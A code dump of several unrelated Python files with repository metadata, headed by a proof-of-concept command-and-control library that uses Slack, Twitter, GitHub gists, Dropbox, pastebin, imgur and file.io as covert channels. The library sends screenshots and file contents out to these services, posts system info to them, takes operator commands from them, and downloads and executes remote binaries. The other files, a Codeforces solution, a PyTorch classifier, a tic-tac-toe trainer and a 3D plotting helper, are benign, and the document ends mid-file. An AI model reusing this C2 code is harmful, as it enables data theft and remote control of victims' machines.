8ec186c4e3adffdeaef95f08452042f97de330e2 | 11,725 | py | Python | saasy_boi/apis.py | NetskopeOSS/sassy_boi | dbbfd9223a8a93e495ea39c0e8ea54be5fb47715 | [
"BSD-3-Clause"
] | 6 | 2019-10-09T03:51:34.000Z | 2022-01-08T19:59:07.000Z | saasy_boi/apis.py | NetskopeOSS/sassy_boi | dbbfd9223a8a93e495ea39c0e8ea54be5fb47715 | [
"BSD-3-Clause"
] | null | null | null | saasy_boi/apis.py | NetskopeOSS/sassy_boi | dbbfd9223a8a93e495ea39c0e8ea54be5fb47715 | [
"BSD-3-Clause"
] | 1 | 2021-08-05T07:25:06.000Z | 2021-08-05T07:25:06.000Z | # Copyright 2019 Netskope, Inc.
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
# disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Written by Erick Galinkin
#
# This code is a proof of concept intended for research purposes only. It does not contain any payloads. It is not
# weaponized.
import requests
import utils
import time
import tempfile
import shutil
import base64
import os
import tweepy
from tweepy.api import API
import json
# Desktop Chrome user-agent string sent with every request so traffic blends
# in with an ordinary browser.
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) " \
"Chrome/74.0.3729.169 Safari/537.36"
def imgur_capture_screen(creds, sleep=0, admin=False):
    """
    Capture the screen after (optionally) sleeping for some number of seconds
    and upload it to imgur. When admin is True the screenshot is staged in a
    temp directory (and the directory removed afterwards); otherwise the file
    is written to the working directory and deleted.
    Returns the imgur link.
    """
    time.sleep(sleep)
    if admin:
        tempdir = tempfile.mkdtemp()
        fname = utils.screenshot(tempdir, "screencap.png")
    else:
        fname = utils.screenshot("./", "screencap.png")
    link = imgur_upload_image(fname, creds)
    if admin:
        shutil.rmtree(tempdir)
    else:
        os.remove(fname)
    return link
def imgur_upload_image(image_path, creds):
    """Upload the image at image_path to imgur using the given client ID.

    Returns the imgur link, or the string "Upload failed" on any error.
    """
    url = "https://api.imgur.com/3/image"
    headers = {
        'user-agent': user_agent,
        'authorization': 'Client-ID {}'.format(creds)
    }
    try:
        # Close the file handle deterministically (original leaked it).
        with open(image_path, 'rb') as img:
            payload = {
                'image': base64.b64encode(img.read()),
                'title': image_path
            }
        r = requests.post(url, headers=headers, data=payload)
        data = r.json()
        return data['data']['link']
    except Exception:
        return "Upload failed"
def get_keys():
    """Read C2 key URLs from urls.txt and fetch the first reachable key.

    urls.txt has one "<Method> <url>" pair per line (e.g. "Slack <url>",
    "Twitter <url>"). Twitter keys are ';'-separated and returned as a tuple.
    Returns (method, key), or (None, None) when nothing is reachable.
    """
    # TODO: have a better way to get keys - maybe CLI arguments.
    with open("urls.txt") as f:
        urls = [line.strip().split(" ") for line in f]
    # (Deliberately not deleting urls.txt here; see original note about
    # covering tracks.)
    headers = {
        'user-agent': user_agent
    }
    for url in urls:
        try:
            method = url[0]
            r = requests.get(url[1], headers=headers)
            key = r.text.strip()
            if method == "Twitter":
                key = tuple(key.split(";"))
            return method, key
        except Exception:
            pass
    return None, None
def pastebin_paste_file_contents(devkey, filepath):
    """Paste the contents of filepath to pastebin; return the response text
    (the paste URL on success, an error message otherwise)."""
    url = "https://pastebin.com/api/api_post.php"
    headers = {
        'user-agent': user_agent
    }
    with open(filepath, "r") as f:
        contents = f.read()
    args = {
        "api_dev_key": devkey,
        "api_option": "paste",
        "api_paste_code": contents
    }
    r = requests.post(url, headers=headers, data=args)
    return r.text
def github_get_commands(gist_location):
    """Fetch the raw gist at gist_location and return its text as the command."""
    headers = {
        'user-agent': user_agent
    }
    # BUG FIX: `headers` was passed positionally, so requests treated it as
    # query `params` and the user-agent header was never sent.
    r = requests.get(gist_location, headers=headers)
    return r.text
def dropbox_download_exec(creds, filepath):
    """Download filepath from Dropbox, write it locally as 'asdf', execute it,
    then remove it."""
    url = "https://content.dropboxapi.com/2/files/download"
    headers = {
        "Authorization": "Bearer {}".format(creds),
        "Dropbox-API-Arg": "{\"path\":\"" + filepath + "\"}"
    }
    r = requests.post(url, headers=headers)
    # BUG FIX: use the raw response bytes; r.text.encode() re-decodes/encodes
    # and corrupts binary payloads. Also close the file before executing.
    with open("asdf", "wb") as f:
        f.write(r.content)
    os.system("chmod 777 asdf")
    os.system("./asdf")
    os.remove("asdf")
def dropbox_upload(creds, cname, filepath):
    """Upload filepath into the Dropbox folder /cname (created on demand).

    Returns True on HTTP 200, False on other statuses, or None when the
    folder could not be ensured.
    """
    if not dropbox_folder_check(creds, cname):
        return None
    url = "https://content.dropboxapi.com/2/files/upload"
    fname = os.path.basename(filepath)
    headers = {
        'user-agent': user_agent,
        'Content-type': "application/octet-stream",
        'Authorization': "Bearer {}".format(creds),
        "Dropbox-API-Arg": "{\"path\":\"/" + cname.lower() + "/" + fname.lower() + "\",\"autorename\":true}"
    }
    # Close the file handle deterministically (original leaked it).
    with open(filepath, "rb") as f:
        data = f.read()
    r = requests.post(url, headers=headers, data=data)
    return r.status_code == 200
def dropbox_folder_check(creds, folder_name):
    """Ensure /folder_name exists in Dropbox, creating it when missing.

    Returns True when the folder exists or was created, False otherwise.
    """
    url = "https://api.dropboxapi.com/2/files/list_folder"
    headers = {
        'user-agent': user_agent,
        'Content-type': "application/json",
        'Authorization': "Bearer {}".format(creds),
    }
    content = {
        "path": "/{}".format(folder_name.lower())
    }
    r = requests.post(url, headers=headers, data=json.dumps(content))
    if r.status_code != 200:
        # Folder not found; try to create it.
        url = "https://api.dropboxapi.com/2/files/create_folder_v2"
        r = requests.post(url, headers=headers, data=json.dumps(content))
        if r.status_code != 200:
            return False
    return True
def slack_checkin(creds, sysinfo):
    """Post sysinfo to the workspace's #general channel and return its pinned
    command list, or None when no #general channel exists or posting fails."""
    url = "https://slack.com/api/conversations.list?token={}".format(creds)
    headers = {
        'user-agent': user_agent,
        'Content-type': "application/json"
    }
    r = requests.get(url, headers=headers)
    data = r.json()
    # BUG FIX: the original referenced channel_id after the loop and raised
    # NameError when no channel named 'general' was found.
    channel_id = None
    for channel in data['channels']:
        if channel['name'] == 'general':
            channel_id = channel['id']
    if channel_id is None:
        return None
    resp = slack_post_to_channel(channel_id, creds, sysinfo)
    if resp is not None:
        return slack_get_pins(channel_id, creds)
    return None
def slack_upload_file(channel, creds, file):
    """Upload a local file to a Slack channel; return its private download URL."""
    url = "https://slack.com/api/files.upload"
    headers = {
        'user-agent': user_agent,
        'Authorization': "Bearer {}".format(creds)
    }
    # Close the file handle deterministically (original leaked it).
    with open(file, 'rb') as fh:
        content = {
            'file': (file, fh),
            'initial_comment': file,
            'channels': channel,
        }
        r = requests.post(url, headers=headers, files=content)
    data = r.json()
    return data['file']['url_private_download']
def slack_create_channel(channel_name, creds):
    """Create a Slack channel; return its id on success, None otherwise."""
    url = "https://slack.com/api/channels.create?token={}&name={}".format(creds, channel_name)
    headers = {
        'user-agent': user_agent,
        'Content-type': "application/json",
    }
    r = requests.post(url, headers=headers)
    data = r.json()
    if data["ok"]:
        return data["channel"]["id"]
    return None  # explicit (was an implicit fall-through) — behavior unchanged
def slack_get_commands(channel, creds):
    """Return the latest human-authored channel message split into lines,
    or None when the latest message is from a bot or the call fails."""
    # We could probably listen via the Events API, but that sounds a lot like
    # hosting an HTTP server on localhost.
    url = "https://slack.com/api/conversations.history?token={}&channel={}&limit=1".format(creds, channel)
    headers = {
        'user-agent': user_agent,
        'Content-type': "application/x-www-form-urlencoded"
    }
    r = requests.get(url, headers=headers)
    data = r.json()
    if data["ok"]:
        latest = data['messages'][-1]
        # Ignore our own bot-posted messages.
        if latest.get("subtype") == "bot_message":
            return None
        return latest["text"].split("\n")
    return None
def slack_get_pins(channel, creds):
    """Return the first pinned message's text split into lines, or None."""
    url = "https://slack.com/api/pins.list?token={}&channel={}".format(creds, channel)
    headers = {
        'user-agent': user_agent
    }
    r = requests.get(url, headers=headers)
    data = r.json()
    if data['ok']:
        return data['items'][0]['message']['text'].split("\n")
    return None  # explicit (was an implicit fall-through) — behavior unchanged
def slack_post_to_channel(channel, creds, message):
    """Post message to a Slack channel; return the channel id on success,
    None on failure."""
    url = "https://slack.com/api/chat.postMessage"
    headers = {
        'user-agent': user_agent,
        'Content-type': "application/json",
        'Authorization': "Bearer {}".format(creds)
    }
    content = {
        "channel": channel,
        "text": message
    }
    r = requests.post(url, headers=headers, json=content)
    data = r.json()
    return channel if data["ok"] else None
# TODO: handle the API objects better so we don't get rate limited all the time
def twitter_checkin(creds, sysinfo):
    """Tweet sysinfo as a status update from the controlled account.

    creds is a (consumer_key, consumer_secret, access_token,
    access_token_secret) tuple.
    """
    consumer_key, consumer_secret, access_token, access_token_secret = creds
    auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
    auth.set_access_token(access_token, access_token_secret)
    api = API(auth, wait_on_rate_limit=True)
    api.update_status(sysinfo)
    return ["twitter_checkin"]
def twitter_get_commands(creds):
    """Return the text of the newest operator-sent DM, or None.

    DMs carrying a "source_app_id" were sent by this app itself and are
    skipped; only the first human-authored DM of the latest three is used.
    """
    consumer_key, consumer_secret, access_token, access_token_secret = creds
    auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
    auth.set_access_token(access_token, access_token_secret)
    api = API(auth, wait_on_rate_limit=True)
    for dm in api.list_direct_messages(3):
        if "source_app_id" not in dm.message_create.keys():
            return dm.message_create['message_data']['text']
    return None
def twitter_post_response(creds, message, user):
    """DM *message* to *user* from the controlled account; always returns True."""
    consumer_key, consumer_secret, access_token, access_token_secret = creds
    auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
    auth.set_access_token(access_token, access_token_secret)
    api = API(auth, wait_on_rate_limit=True)
    api.send_direct_message(user, message)
    return True
def fileio_upload(filepath):
    """Upload filepath to file.io; return the one-time download link."""
    headers = {
        'user-agent': user_agent
    }
    # Close the file handle deterministically (original leaked it).
    with open(filepath, 'rb') as fh:
        files = {
            'file': (filepath, fh),
        }
        r = requests.post('https://file.io/', files=files, headers=headers)
    data = r.json()
    return data['link']
def fileio_download_exec(filekey):
    """Download a file.io payload by key, write it locally as 'asdf', execute
    it, then remove it."""
    url = "https://file.io/{}".format(filekey)
    headers = {
        'user-agent': user_agent
    }
    r = requests.get(url, headers=headers)
    # BUG FIX: use the raw response bytes; r.text.encode() re-decodes/encodes
    # and corrupts binary payloads.
    with open("asdf", "wb") as f:
        f.write(r.content)
    os.system("chmod 777 asdf")
    os.system("./asdf")
    os.remove("asdf")
| 27.916667 | 120 | 0.615778 | 1,469 | 11,725 | 4.81484 | 0.252553 | 0.036901 | 0.03167 | 0.039587 | 0.379188 | 0.336774 | 0.293369 | 0.251378 | 0.214478 | 0.20557 | 0 | 0.008366 | 0.266013 | 11,725 | 419 | 121 | 27.983294 | 0.813502 | 0.206482 | 0 | 0.454545 | 0 | 0.003247 | 0.1823 | 0.006167 | 0 | 0 | 0 | 0.002387 | 0 | 1 | 0.061688 | false | 0.003247 | 0.032468 | 0 | 0.178571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ec330c45c5450e56db86bcc225b4e9c85a36af2 | 941 | py | Python | codeforces/B/8-451B.py | safiulanik/problem-solving | 116539750b901b55fe6e69447c8ede78f2e9ff16 | [
"MIT"
] | null | null | null | codeforces/B/8-451B.py | safiulanik/problem-solving | 116539750b901b55fe6e69447c8ede78f2e9ff16 | [
"MIT"
] | null | null | null | codeforces/B/8-451B.py | safiulanik/problem-solving | 116539750b901b55fe6e69447c8ede78f2e9ff16 | [
"MIT"
] | null | null | null | """
URL: https://codeforces.com/problemset/problem/451/B
Author: Safiul Kabir [safiulanik at gmail.com]
Tags: implementation, sortings, *1300
"""
def main():
    """Codeforces 451B: read n and a list; decide whether sorting is possible
    by reversing exactly one segment, printing "yes" plus the 1-based segment
    bounds, or "no".
    """
    n = int(input())
    ll = list(map(int, input().split()))
    start, end = -1, -1
    # Find the first descent: the segment to reverse starts there.
    for i in range(n - 1):
        if ll[i] > ll[i + 1]:
            start = i + 1
            break
    if start == -1:
        # Already sorted; reversing the trivial segment [1, 1] works.
        print('yes')
        print('1 1')
        return
    # The segment ends where the sequence starts ascending again.
    for i in range(start, n - 1):
        if ll[i] < ll[i + 1]:
            end = i + 1
            break
    if start > -1 and end == -1:
        end = n
    # Verify the prefix before the segment stays below the reversed segment...
    for i in range(start - 1):
        if ll[i] > ll[end - 1]:
            print('no')
            break
    else:
        # ...and the suffix after it stays sorted and above the segment start.
        for i in range(end, n):
            if ll[i] < ll[start - 1] or (i < n - 1 and ll[i] > ll[i + 1]):
                print('no')
                break
        else:
            print('yes')
            print(f'{start} {end}')
# Script entry point: solve a single test case from stdin.
main()
| 20.021277 | 74 | 0.430393 | 133 | 941 | 3.045113 | 0.330827 | 0.059259 | 0.061728 | 0.108642 | 0.325926 | 0.128395 | 0.054321 | 0.054321 | 0 | 0 | 0 | 0.045126 | 0.411265 | 941 | 46 | 75 | 20.456522 | 0.685921 | 0.14559 | 0 | 0.322581 | 0 | 0 | 0.032663 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032258 | false | 0 | 0 | 0 | 0.064516 | 0.193548 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ec5c30f23ba531d5364376457bcfc23d7f65b85 | 2,877 | py | Python | finetune-data-sampling/pytorch_softmax_regression_4_class.py | lankuohsing/machine-learning-in-python | a7317325dd914402231ee908e4208e1ddb171a28 | [
"MIT"
] | null | null | null | finetune-data-sampling/pytorch_softmax_regression_4_class.py | lankuohsing/machine-learning-in-python | a7317325dd914402231ee908e4208e1ddb171a28 | [
"MIT"
] | null | null | null | finetune-data-sampling/pytorch_softmax_regression_4_class.py | lankuohsing/machine-learning-in-python | a7317325dd914402231ee908e4208e1ddb171a28 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Tue Dec 7 22:03:24 2021
@author: lankuohsing
"""
import numpy as np
import torch.utils.data as Data
import torch
from collections import OrderedDict
from torchsummary import summary
# In[]
# Load the 2-D, 4-class point dataset. Each line is "x y label"; labels are
# shifted to 0-based. Points inside the radius-0.5 circle around (2, 2) are
# held out into data2/labels2; everything else trains the model.
data1 = []
labels1 = []
data2 = []
labels2 = []
with open("./dataset/4_class_data_2d.txt", 'r', encoding="UTF-8") as rf:
    for line in rf:
        split_list = line.strip().split(" ")
        x = float(split_list[0])
        y = float(split_list[1])
        label = int(split_list[2])
        if (x - 2) ** 2 + (y - 2) ** 2 <= 0.5 ** 2:
            data2.append([x, y])
            labels2.append([label - 1])
        else:
            data1.append([x, y])
            labels1.append([label - 1])

# In[]
class_num = 4
features = torch.tensor(data1, dtype=torch.float)
labels = torch.tensor(labels1, dtype=torch.long)
# One-hot encode the integer labels into (N, class_num).
one_hot_labels = torch.zeros(len(labels), class_num).scatter_(1, labels, 1)
batch_size = 64
# Combine the training features and labels into a dataset.
dataset = Data.TensorDataset(features, one_hot_labels)
# Read random mini-batches.
train_loader = Data.DataLoader(dataset, batch_size, shuffle=True)
# NOTE(review): evaluation reuses the training loader — no held-out test set.
test_loader = train_loader
epochs = 100
# In[]
num_inputs = 2
num_outputs = 4
class LinearNet(torch.nn.Module):
    """Single-linear-layer classifier: flattens the input and applies one
    Linear(num_inputs -> num_outputs) projection."""

    def __init__(self, num_inputs, num_outputs):
        super(LinearNet, self).__init__()
        self.linear = torch.nn.Linear(num_inputs, num_outputs)

    def forward(self, x):  # x.shape: (batch, num_inputs)
        # Flatten trailing dimensions, then project to class logits.
        return self.linear(x.view(x.shape[0], -1))
softmax_regression = torch.nn.Sequential(
    OrderedDict([
        ("linear", torch.nn.Linear(num_inputs, num_outputs))
    ])
)
torch.nn.init.normal_(softmax_regression.linear.weight, mean=0, std=0.01)
# NOTE(review): this constant init immediately overwrites the normal init on
# the *weight*; it was possibly meant for the bias — confirm intent.
torch.nn.init.constant_(softmax_regression.linear.weight, val=0.01)
criterion = torch.nn.CrossEntropyLoss()
optimizer = torch.optim.SGD(softmax_regression.parameters(), lr=0.01)

for epoch in range(epochs):
    for batch_idx, (feature_in_on_batch, label_in_one_batch) in enumerate(train_loader):
        logits = softmax_regression(feature_in_on_batch)
        loss = criterion(logits, label_in_one_batch)
        break  # NOTE(review): only the first batch per epoch is used — confirm intent
    optimizer.zero_grad()
    loss.backward()
    optimizer.step()
    # if batch_idx % 100 == 0:
    #     print("Train Epoch: {} [{}/{}({:0f}%)]\tLoss: {:6f}".format(epoch, batch_idx * len(feature_in_on_batch), len(train_loader.dataset), 100. * batch_idx / len(train_loader), loss.item()))

# Evaluate on the (shared) test loader: average loss and one-hot accuracy.
test_loss = 0
correct = 0
for data, target in test_loader:
    logits = softmax_regression(data)
    test_loss += criterion(logits, target).item()
    pred = logits.data.max(1)[1]
    # Recover class indices from the one-hot targets for comparison.
    correct += pred.eq(torch.nonzero(target.data)[:, 1]).sum()
test_loss /= len(test_loader.dataset)
print("\nTest set: Average loss: {:.4f}, Accuracy: {}/{}({:.3f}%)".
      format(test_loss, correct,
             len(test_loader.dataset),
             100. * correct / len(test_loader.dataset)))
# In[]
summary(softmax_regression, (1, 2))
summary(softmax_regression,(1,2)) | 33.453488 | 186 | 0.668752 | 410 | 2,877 | 4.507317 | 0.356098 | 0.026515 | 0.019481 | 0.030844 | 0.070346 | 0.041126 | 0.041126 | 0.041126 | 0 | 0 | 0 | 0.033784 | 0.17692 | 2,877 | 86 | 187 | 33.453488 | 0.746622 | 0.126521 | 0 | 0 | 0 | 0 | 0.040048 | 0.011614 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028986 | false | 0 | 0.072464 | 0 | 0.130435 | 0.014493 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ec8117705a6e00290140c42310bd866602c4857 | 6,543 | py | Python | Training.py | Waewarin-C/MLProject | 9bd3821db24b1210621169cbbfdd68a1d6e6ab20 | [
"CC-BY-4.0"
] | null | null | null | Training.py | Waewarin-C/MLProject | 9bd3821db24b1210621169cbbfdd68a1d6e6ab20 | [
"CC-BY-4.0"
] | null | null | null | Training.py | Waewarin-C/MLProject | 9bd3821db24b1210621169cbbfdd68a1d6e6ab20 | [
"CC-BY-4.0"
] | null | null | null | from TabularTrainer import *
from RandomPlayer import *
from TicTacToe import *
import matplotlib.pyplot as plt
# Maps a flat action index 0-8 to its (row, col) coordinate on the 3x3 board.
action_to_coordinate = {0: (0, 0), 1: (0, 1), 2: (0, 2),
3: (1, 0), 4: (1, 1), 5: (1, 2),
6: (2, 0), 7: (2, 1), 8: (2, 2)}

# Number of battles per training run, and games played per battle.
NUM_OF_BATTLES = 10
NUM_OF_GAMES = 50
#NOTE: tried to keep anything updating the board in this tile so we could use the TicTacToe functions
class Training:
def begin_training(self, number_of_battles=NUM_OF_BATTLES):
    """Run a series of battles and plot win/draw percentages over time.

    Each battle is NUM_OF_GAMES games; per battle we record the percentage
    of agent-1 wins, agent-2 wins, and draws, then hand the series to
    visualize_training_results.
    """
    print("training started")
    agent1_wins = []
    agent2_wins = []
    draws = []
    count = []
    counter = 0
    for i in range(0, number_of_battles):
        print("battle " + str(i))
        agent1Win, agent2Win, draw = self.battleRounds()
        # Express each outcome as a percentage of the battle's games.
        total = agent1Win + agent2Win + draw
        agent1_wins.append((agent1Win / total) * 100)
        agent2_wins.append((agent2Win / total) * 100)
        draws.append((draw / total) * 100)
        counter = counter + 1
        count.append(counter * NUM_OF_GAMES)  # cumulative games played
    self.visualize_training_results(count, agent1_wins, agent2_wins, draws)
    print("training ended")
def battleRounds(self, number_of_games=NUM_OF_GAMES):
    """Play number_of_games games between a tabular agent ('O') and a random
    agent ('X'); persist the tabular agent's learning after each win.

    Returns (agent1_wins, agent2_wins, draws).
    """
    agent1 = TabularTrainer('O', 'Agent 1')
    # agent2 = TabularTrainer('X', 'Agent 2')
    agent2 = RandomPlayer('X', 'Agent 2')
    agent1WinCount = 0
    agent2WinCount = 0
    drawCount = 0
    for i in range(0, number_of_games):
        print("game " + str(i))
        winner = self.playGame(agent1, agent2, number_of_games)
        if winner == 1:
            if isinstance(agent1, TabularTrainer):
                agent1.save_to_file()
                agent1.historic_data.clear()
            agent1WinCount += 1
        elif winner == 2:
            if isinstance(agent2, TabularTrainer):
                agent2.save_to_file()
                agent2.historic_data.clear()
            agent2WinCount += 1
        else:
            drawCount += 1
    return agent1WinCount, agent2WinCount, drawCount
def playGame(self, agent1, agent2, number_of_games) -> int:
    """Play one TicTacToe game, alternating agent1/agent2 moves until the
    board is decided; return 1, 2 (winner) or 0 (draw)."""
    game = TicTacToe(agent1, agent2)
    finished = False
    while not finished:
        finished = self.evaluateMove(agent1, game)
        if finished:
            break
        finished = self.evaluateMove(agent2, game)
        if finished:
            break
    game.determine_winner()
    return self.get_game_results(game, agent1, agent2)
def evaluateMove(self, agent, game):
    """Ask *agent* for a move, apply it to *game*, and return True when the
    game is over (no move available, or the board reached a terminal state)."""
    move = agent.move(game.game_board)
    if move == -1:
        # Agent has no legal move left.
        return True
    coord = action_to_coordinate[move]
    game.play_round(coord)
    game.game_board.setSpaceTaken(coord)
    return self.game_is_finished(game.get_board_grid())
def game_is_finished(self, board):
    """Return True when the 3x3 `board` is terminal.

    Terminal means either every cell equals 0, or some row, column, or
    diagonal holds three equal values greater than 0.
    """
    if np.all(board == 0):
        return True
    # All eight possible three-in-a-row coordinate triples.
    triples = (
        ((0, 0), (0, 1), (0, 2)),  # rows
        ((1, 0), (1, 1), (1, 2)),
        ((2, 0), (2, 1), (2, 2)),
        ((0, 0), (1, 1), (2, 2)),  # diagonals
        ((0, 2), (1, 1), (2, 0)),
        ((0, 0), (1, 0), (2, 0)),  # columns
        ((0, 1), (1, 1), (2, 1)),
        ((0, 2), (1, 2), (2, 2)),
    )
    for first, second, third in triples:
        if board[first] > 0 and board[first] == board[second] == board[third]:
            return True
    return False
def get_game_results(self, game, agent1, agent2) -> int:
    """Report the finished game's outcome to any learning agents and
    translate it into a numeric winner code.

    Args:
        game: the finished TicTacToe game (game_won / tie_game already set).
        agent1: player one's agent.
        agent2: player two's agent.

    Returns:
        1 if player one won, 2 if player two won, 0 for a tie (or an
        unfinished game).
    """
    winner = 0
    if game.game_won:
        if game.winning_player == game.player_one:
            if isinstance(agent1, TabularTrainer):
                agent1.result("won")
            if isinstance(agent2, TabularTrainer):
                agent2.result("loss")
            winner = 1
        else:
            if isinstance(agent1, TabularTrainer):
                agent1.result("loss")
            if isinstance(agent2, TabularTrainer):
                agent2.result("won")
            winner = 2
    elif game.tie_game:
        if isinstance(agent1, TabularTrainer):
            agent1.result("tie")
        if isinstance(agent2, TabularTrainer):
            agent2.result("tie")
    # NOTE(review): dead code removed — the original also computed a local
    # `higher_q_values` (via see_who_has_higher_qvalues / final_q_values)
    # here, but the value was never used or returned.
    return winner
def see_who_has_higher_qvalues(self, agent1_q_values, agent2_q_values):
    """Return whichever agent's Q-value list has the larger total.

    Ties (equal sums) favour agent 1's values.
    """
    total_one = 0.0
    total_two = 0.0
    for value_one, value_two in zip(agent1_q_values, agent2_q_values):
        total_one += value_one
        total_two += value_two
    if total_two > total_one:
        return agent2_q_values
    # Agent 1 wins outright or the totals are equal.
    return agent1_q_values
# Plot the number of games each agent wins and ties
def visualize_training_results(self, gameNum, agent1_wins, agent2_wins, draws):
    """Plot win/draw percentages for both agents against games played.

    Args:
        gameNum: x-axis values (cumulative number of games played).
        agent1_wins: per-battle win percentage for agent 1.
        agent2_wins: per-battle win percentage for agent 2.
        draws: per-battle draw percentage.

    Displays the chart with ``plt.show()`` (blocking until closed).
    """
    plt.plot(gameNum, agent1_wins)
    plt.plot(gameNum, agent2_wins)
    plt.plot(gameNum, draws)
    plt.title('Battle Round Metrics')
    # Legend entries must stay in the same order as the plot calls above.
    plt.legend(['Agent 1 Wins', 'Agent 2 Wins', 'Draws'])
    plt.xlabel('Number of Games')
    plt.ylabel('Percentage of Agent Wins or Draws')
    plt.show()
| 34.436842 | 107 | 0.561058 | 795 | 6,543 | 4.474214 | 0.208805 | 0.031487 | 0.030363 | 0.031487 | 0.264268 | 0.187799 | 0.07928 | 0.07928 | 0.067473 | 0.058195 | 0 | 0.050988 | 0.334556 | 6,543 | 189 | 108 | 34.619048 | 0.765962 | 0.073667 | 0 | 0.2 | 0 | 0 | 0.028921 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057143 | false | 0 | 0.028571 | 0 | 0.157143 | 0.028571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ec9af37320f3317b87c57c752336e62fe5c3973 | 3,402 | py | Python | util/visualize3d.py | jshuhnow/OddEyeCam | ed76cd1c29701b7b49f20bcd61e7e72d3140fda8 | [
"MIT"
] | 8 | 2020-10-08T13:32:33.000Z | 2021-12-08T10:59:03.000Z | util/visualize3d.py | jshuhnow/OddEyeCam | ed76cd1c29701b7b49f20bcd61e7e72d3140fda8 | [
"MIT"
] | null | null | null | util/visualize3d.py | jshuhnow/OddEyeCam | ed76cd1c29701b7b49f20bcd61e7e72d3140fda8 | [
"MIT"
] | 1 | 2021-04-15T23:50:13.000Z | 2021-04-15T23:50:13.000Z | import os
import sys
from core.math_tool.coordinate_system import CoordSys
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import cv2
def _update_element(obj,data,is_Point=False):
if is_Point:
obj.set_data(data[0], data[1])
obj.set_3d_properties(data[2], zdir="z")
else:
obj.set_data(data[:,0], data[:,1])
obj.set_3d_properties(data[:,2], zdir="z")
def _update(obj_list, data, length=100):
    """Refresh a pose's centre point and its three scaled axis segments.

    `obj_list` holds four artists in order: [centre, x-axis, y-axis, z-axis];
    `data` supplies .center and unit .x_axis/.y_axis/.z_axis vectors.
    """
    origin = data.center
    _update_element(obj_list[0], origin, is_Point=True)
    directions = (data.x_axis, data.y_axis, data.z_axis)
    for artist, direction in zip(obj_list[1:], directions):
        # Each axis is drawn as a segment from the centre, `length` long.
        segment = np.array([origin, origin + direction * length])
        _update_element(artist, segment)
def visualize_3d(ref_,pred_,truth=None,user_exit=False):
    """Continuously render predicted (and optional ground-truth) poses in an
    interactive 3-D matplotlib figure.

    Args:
        ref_: one-element container whose [0] holds the current reference
            pose -- presumably shared with a producer thread, TODO confirm.
        pred_: one-element container whose [0] holds the current prediction.
        truth: optional ground-truth pose, redrawn every frame when given.
        user_exit: when truthy, the loop terminates the process via exit().

    NOTE(review): this function never returns normally -- it loops forever,
    redrawing whenever both ref_[0] and pred_[0] are non-None.
    """
    # Plot Configure
    plt.ion()
    fig = plt.figure(figsize=(8, 8))
    ax = fig.add_subplot(111, projection='3d') # Axe3D object
    ax.set_xlabel('$x$',); ax.set_ylabel('$y$'); ax.set_zlabel('$z$')
    ax.view_init(elev=120, azim=60)
    ax.dist = 10
    # Placeholder data range used to create empty artists; real data is
    # pushed in later via _update().
    r_start, r_end = -1,1
    x_axis_, y_axis_, z_axis_ = np.array([[-400,0,0],[400,0,0]]), np.array([[0,-400,0],[0,400,0]]), np.array([[0,0,0],[0,0,800]])
    # Reference Object (green dot + RGB axis lines)
    visRefPoints, = ax.plot(range(r_start,r_end),
                            range(r_start,r_end),
                            range(r_start,r_end),
                            alpha=1, linestyle="", marker=".", c='g')
    visRefAxisX, = ax.plot(x_axis_[:,0], x_axis_[:,1], x_axis_[:,2],alpha=0.6, c='r')
